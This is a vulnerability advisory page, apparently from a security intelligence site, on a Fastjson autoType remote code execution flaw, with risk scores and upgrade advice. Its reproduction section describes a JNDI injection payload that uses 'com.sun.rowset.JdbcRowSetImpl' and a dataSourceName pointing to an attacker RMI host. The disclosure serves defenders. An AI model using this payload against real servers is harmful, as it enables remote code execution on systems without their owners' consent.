Volerion logoVolerion
Volerion logoVolerion

Actively Exploited in the Wild

This vulnerability is being actively exploited in the wild.

Fastjson Remote Code Execution Vulnerability

Vulnerability

A remote code execution vulnerability exists in Fastjson versions prior to 1.2.48. This issue arises from improper handling of the autoType feature. When a JSON document contains an '@type' key with a value corresponding to a Java class name, it can lead to the execution of public methods of that class. Exploitation of this vulnerability allows for JNDI injection, with an attacker-supplied payload hidden elsewhere in the JSON document. This vulnerability has been actively exploited in the wild from 2023 to 2025.

Impact

Exploitation of this vulnerability allows for remote code execution on the server where Fastjson is used.

Reproduction

The vulnerability can be reproduced by sending a JSON payload that includes an '@type' key with a value of 'com.sun.rowset.JdbcRowSetImpl'. This payload should be sent to a server using Fastjson for JSON parsing. The 'dataSourceName' field of the payload can be set to 'rmi://<attacker_ip>:<port>/Exploit' to execute commands on the server via JNDI injection.

Remediation

Users are advised to update Fastjson to version 1.2.48 or later.

Added: Jan 9, 2026, 7:35 AM
Updated: Jan 9, 2026, 7:35 AM

Vulnerability Rating

Custom Algorithm
spread
6.6
impact
7.5
exploitability
6.4
remediation
7.7
relevance
2.0
threat
8.0
urgency
2.9
incentive
1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.